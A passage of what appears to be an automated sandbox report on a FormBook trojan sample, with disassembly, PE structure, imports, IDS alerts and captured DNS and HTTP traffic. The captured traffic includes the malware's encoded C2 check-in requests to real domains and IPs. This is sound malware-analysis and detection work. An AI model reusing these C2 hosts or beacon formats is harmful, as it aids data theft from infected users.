                                                mov dword ptr [00423FF8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F4F0h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 00423740h
                                                call 00007FE7208FD6D4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007FE7208FD6C2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x28068.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x2d0000x280680x28200False0.26199255257data5.8434826371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x2d2e00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x3db080x94a8dataEnglishUnited States
                                                RT_ICON0x46fb00x5488dataEnglishUnited States
                                                RT_ICON0x4c4380x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696EnglishUnited States
                                                RT_ICON0x506600x25a8dataEnglishUnited States
                                                RT_ICON0x52c080x10a8dataEnglishUnited States
                                                RT_ICON0x53cb00x988dataEnglishUnited States
                                                RT_ICON0x546380x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x54aa00x100dataEnglishUnited States
                                                RT_DIALOG0x54ba00x11cdataEnglishUnited States
                                                RT_DIALOG0x54cc00x60dataEnglishUnited States
                                                RT_GROUP_ICON0x54d200x76dataEnglishUnited States
                                                RT_MANIFEST0x54d980x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                10/13/21-16:32:21.743198TCP1201ATTACK-RESPONSES 403 Forbidden804979634.102.136.180192.168.2.6
                                                10/13/21-16:32:42.685873TCP1201ATTACK-RESPONSES 403 Forbidden804980934.102.136.180192.168.2.6
                                                10/13/21-16:32:48.382262TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:32:48.382262TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:32:48.382262TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:33:00.400927TCP1201ATTACK-RESPONSES 403 Forbidden804984034.102.136.180192.168.2.6
                                                10/13/21-16:33:20.400217TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171
                                                10/13/21-16:33:20.400217TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171
                                                10/13/21-16:33:20.400217TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 16:32:21.611291885 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.629221916 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.629390001 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.629479885 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.647284031 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743197918 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743272066 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743387938 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.743482113 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.761204958 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:26.778966904 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.827833891 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.828027964 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.828304052 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.876580954 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878040075 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878061056 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878074884 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878226995 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.878277063 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.878371000 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.926930904 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:31.995559931 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.133052111 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:32.133186102 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.133338928 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.270781994 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:32.270977974 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.271035910 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.408277988 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:37.423695087 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.462107897 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.462608099 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.462970972 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.501425982 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.501957893 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.501981020 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.502202034 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.502230883 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.540597916 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:42.552027941 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.570043087 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.570606947 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.570636034 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.589291096 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.685873032 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.685899019 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.686481953 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.686516047 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:43.038979053 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:43.057055950 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:47.810384989 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.380736113 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:48.381952047 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.382261992 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.885271072 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:49.387250900 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:49.389600039 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:49.389750957 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:53.954910994 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.092483044 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:32:54.093113899 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.093128920 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.231038094 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:32:54.231328011 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.231355906 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.368494034 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:33:00.267452955 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.285463095 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.285733938 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.285758972 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.303599119 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.400927067 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.400990963 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.401284933 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.480761051 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.498707056 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:05.526390076 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.708817005 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:05.709094048 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.709494114 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.892004967 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.203414917 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.303915977 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.303946972 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.304178953 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.304214954 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.386147976 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.386403084 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:11.301028013 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.330210924 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.330400944 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.330621958 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.359313965 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.828660011 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.857929945 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.858082056 CEST4984280192.168.2.662.210.5.81

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 16:32:21.559715986 CEST6374553192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:21.604350090 CEST53637458.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:26.761162996 CEST5005553192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:26.777719975 CEST53500558.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:31.888350964 CEST5033953192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:31.994424105 CEST53503398.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:37.304816961 CEST6330753192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:37.421803951 CEST53633078.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:42.526494026 CEST4969453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:42.550077915 CEST53496948.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:47.702405930 CEST5498253192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:47.809142113 CEST53549828.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:53.922291040 CEST6211653192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:53.953161001 CEST53621168.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:00.220139980 CEST6381653192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:00.266294003 CEST53638168.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:05.489540100 CEST5501453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:05.524667978 CEST53550148.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:11.264848948 CEST6220853192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:11.299397945 CEST53622088.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:16.845551968 CEST5757453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:17.104530096 CEST53575748.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Oct 13, 2021 16:32:21.559715986 CEST192.168.2.68.8.8.80x6151Standard query (0)www.playstarexch.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:26.761162996 CEST192.168.2.68.8.8.80xa361Standard query (0)www.anadolu.academyA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:31.888350964 CEST192.168.2.68.8.8.80xeeceStandard query (0)www.altitudebc.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:37.304816961 CEST192.168.2.68.8.8.80xa6ffStandard query (0)www.unasolucioendesa.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:42.526494026 CEST192.168.2.68.8.8.80xcad5Standard query (0)www.elliotpioneer.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:47.702405930 CEST192.168.2.68.8.8.80x8971Standard query (0)www.thesewhitevvalls.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:53.922291040 CEST192.168.2.68.8.8.80x55aStandard query (0)www.lumberjackguitarloops.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:00.220139980 CEST192.168.2.68.8.8.80xfacbStandard query (0)www.carts-amazon.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:05.489540100 CEST192.168.2.68.8.8.80x746fStandard query (0)www.chinaopedia.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:11.264848948 CEST192.168.2.68.8.8.80x113bStandard query (0)www.atp-cayenne.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:16.845551968 CEST192.168.2.68.8.8.80xc659Standard query (0)www.6233v.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Oct 13, 2021 16:32:21.604350090 CEST8.8.8.8192.168.2.60x6151No error (0)www.playstarexch.complaystarexch.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:21.604350090 CEST8.8.8.8192.168.2.60x6151No error (0)playstarexch.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:26.777719975 CEST8.8.8.8192.168.2.60xa361No error (0)www.anadolu.academyanadolu.academyCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:26.777719975 CEST8.8.8.8192.168.2.60xa361No error (0)anadolu.academy94.73.147.156A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:31.994424105 CEST8.8.8.8192.168.2.60xeeceNo error (0)www.altitudebc.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:31.994424105 CEST8.8.8.8192.168.2.60xeeceNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:37.421803951 CEST8.8.8.8192.168.2.60xa6ffNo error (0)www.unasolucioendesa.com82.98.134.154A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:42.550077915 CEST8.8.8.8192.168.2.60xcad5No error (0)www.elliotpioneer.comelliotpioneer.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:42.550077915 CEST8.8.8.8192.168.2.60xcad5No error (0)elliotpioneer.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:47.809142113 CEST8.8.8.8192.168.2.60x8971No error (0)www.thesewhitevvalls.com172.105.103.207A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:53.953161001 CEST8.8.8.8192.168.2.60x55aNo error (0)www.lumberjackguitarloops.compropage.beatstars.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:53.953161001 CEST8.8.8.8192.168.2.60x55aNo error (0)propage.beatstars.com52.206.159.80A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:00.266294003 CEST8.8.8.8192.168.2.60xfacbNo error (0)www.carts-amazon.comcarts-amazon.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:00.266294003 CEST8.8.8.8192.168.2.60xfacbNo error (0)carts-amazon.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:05.524667978 CEST8.8.8.8192.168.2.60x746fNo error (0)www.chinaopedia.comchinaopedia.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:05.524667978 CEST8.8.8.8192.168.2.60x746fNo error (0)chinaopedia.com45.91.80.182A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:11.299397945 CEST8.8.8.8192.168.2.60x113bNo error (0)www.atp-cayenne.com62.210.5.81A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)www.6233v.comtwyg-9639v.com.txwlcdn13.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)twyg-9639v.com.txwlcdn13.compflvcllbpf.bigbackbone.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)pflvcllbpf.bigbackbone.compflvcllbpf.hellomyai.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)pflvcllbpf.hellomyai.com134.122.133.171A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.playstarexch.com
                                                • www.anadolu.academy
                                                • www.altitudebc.com
                                                • www.unasolucioendesa.com
                                                • www.elliotpioneer.com
                                                • www.thesewhitevvalls.com
                                                • www.lumberjackguitarloops.com
                                                • www.carts-amazon.com
                                                • www.chinaopedia.com
                                                • www.atp-cayenne.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.64979634.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:21.629479885 CEST2211OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1
                                                Host: www.playstarexch.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:21.743197918 CEST2309INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:32:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.64979794.73.147.15680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:26.828304052 CEST4898OUTGET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.anadolu.academy
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:26.878040075 CEST4900INHTTP/1.1 404 Not Found
                                                Connection: close
                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                Pragma: no-cache
                                                Content-Type: text/html
                                                Content-Length: 1237
                                                Date: Wed, 13 Oct 2021 14:32:26 GMT
                                                Server: LiteSpeed
                                                Vary: User-Agent
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 